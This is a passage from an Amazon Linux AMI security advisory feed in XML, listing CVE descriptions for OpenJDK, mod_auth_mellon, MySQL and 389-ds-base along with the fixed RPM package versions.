Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
1761006:
CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
CVE-2019-2975:
No description is available for this CVE.
99999:
CVE-2019-2975 OpenJDK: Unexpected exception thrown during regular expression processing in Nashorn (Scripting, 8223518)
CVE-2019-2973:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
1760978:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
CVE-2019-2964:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
1760963:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
CVE-2019-2962:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
1761266:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
CVE-2019-2949:
No description is available for this CVE.
99999:
CVE-2019-2949 OpenJDK: Improper handling of Kerberos proxy credentials (Kerberos, 8220302)
CVE-2019-2945:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
1761596:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2945" title="" id="CVE-2019-2945" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2949" title="" id="CVE-2019-2949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2962" title="" id="CVE-2019-2962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2964" title="" id="CVE-2019-2964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2973" title="" id="CVE-2019-2973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2975" title="" id="CVE-2019-2975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2978" title="" id="CVE-2019-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2981" title="" id="CVE-2019-2981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2983" title="" id="CVE-2019-2983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2987" title="" id="CVE-2019-2987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2988" title="" id="CVE-2019-2988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2989" title="" id="CVE-2019-2989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2992" title="" id="CVE-2019-2992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2999" title="" id="CVE-2019-2999" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.232.b09-0.48.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.232.b09-0.48.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1331</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1331: medium priority package update for mod_auth_mellon mod24_auth_mellon</title><issued date="2020-01-06 23:19:00" /><updated date="2020-01-09 18:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13038:
mod_auth_mellon through 0.14.2 has an Open Redirect via the login?ReturnTo= substring, as demonstrated by omitting the // after http: in the target URL.
99999:
CVE-2019-13038 mod_auth_mellon: an Open Redirect via the login?ReturnTo= substring which could facilitate information theft
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13038" title="" id="CVE-2019-13038" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_auth_mellon" version="0.13.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-0.13.1-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.6.amzn1.i686.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-0.13.1-1.6.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.9.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.9.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1332</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1332: medium priority package update for mysql56</title><issued date="2020-01-06 23:26:00" /><updated date="2020-01-09 18:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2974:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2974 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2019)
CVE-2019-2911:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
99999:
CVE-2019-2911 mysql: Information Schema unspecified vulnerability (CPU Oct 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911" title="" id="CVE-2019-2911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2974" title="" id="CVE-2019-2974" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.46-1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1333</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1333: medium priority package update for mysql57</title><issued date="2020-01-06 23:27:00" /><updated date="2020-01-09 18:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2993:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: C API). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2993 mysql: Server: C API unspecified vulnerability (CPU Oct 2019)
CVE-2019-2974:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2974 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2019)
CVE-2019-2960:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2960 mysql: Server: Replication unspecified vulnerability (CPU Oct 2019)
CVE-2019-2946:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2946 mysql: Server: PS unspecified vulnerability (CPU Oct 2019)
CVE-2019-2938:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2938 mysql: InnoDB unspecified vulnerability (CPU Oct 2019)
CVE-2019-2914:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2914 mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2019)
CVE-2019-2911:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
99999:
CVE-2019-2911 mysql: Information Schema unspecified vulnerability (CPU Oct 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911" title="" id="CVE-2019-2911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2914" title="" id="CVE-2019-2914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2938" title="" id="CVE-2019-2938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2946" title="" id="CVE-2019-2946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2960" title="" id="CVE-2019-2960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2974" title="" id="CVE-2019-2974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2993" title="" id="CVE-2019-2993" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-libs" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.28-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1334</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1334: important priority package update for 389-ds-base</title><issued date="2020-01-14 18:03:00" /><updated date="2020-01-15 21:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3883:
It was found that encrypted connections did not honor the &#039;ioblocktimeout&#039; parameter to end blocking requests. As a result, an unauthenticated attacker could repeatedly start a sufficient number of encrypted connections to block all workers, resulting in a denial of service.
In 389-ds-base up to version 1.4.1.2, requests are handled by workers threads. Each sockets will be waited by the worker for at most 'ioblocktimeout' seconds. However this timeout applies only for un-encrypted requests. Connections using SSL/TLS are not taking this timeout into account during reads, and may hang longer.An unauthenticated attacker could repeatedly create hanging LDAP requests to hang all the workers, resulting in a Denial of Service.
1693612:
CVE-2019-3883 389-ds-base: DoS via hanging secured connections
1693612:
CVE-2019-3883 389-ds-base: DoS via hanging secured connections
CVE-2019-14824:
A flaw was found in the 'deref' plugin of 389-ds-base where it could use the 'search' permission to display attribute values. In some configurations, this could allow an authenticated attacker to view private attributes, such as password hashes.
1747448:
CVE-2019-14824 389-ds-base: Read permission check bypass via the deref plugin
CVE-2019-10224:
A flaw has been found in 389-ds-base versions 1.4.x.x before 1.4.1.3. When executed in verbose mode, the dscreate and dsconf commands may display sensitive information, such as the Directory Manager password. An attacker, able to see the screen or record the terminal standard error output, could use this flaw to gain sensitive information.
1677147:
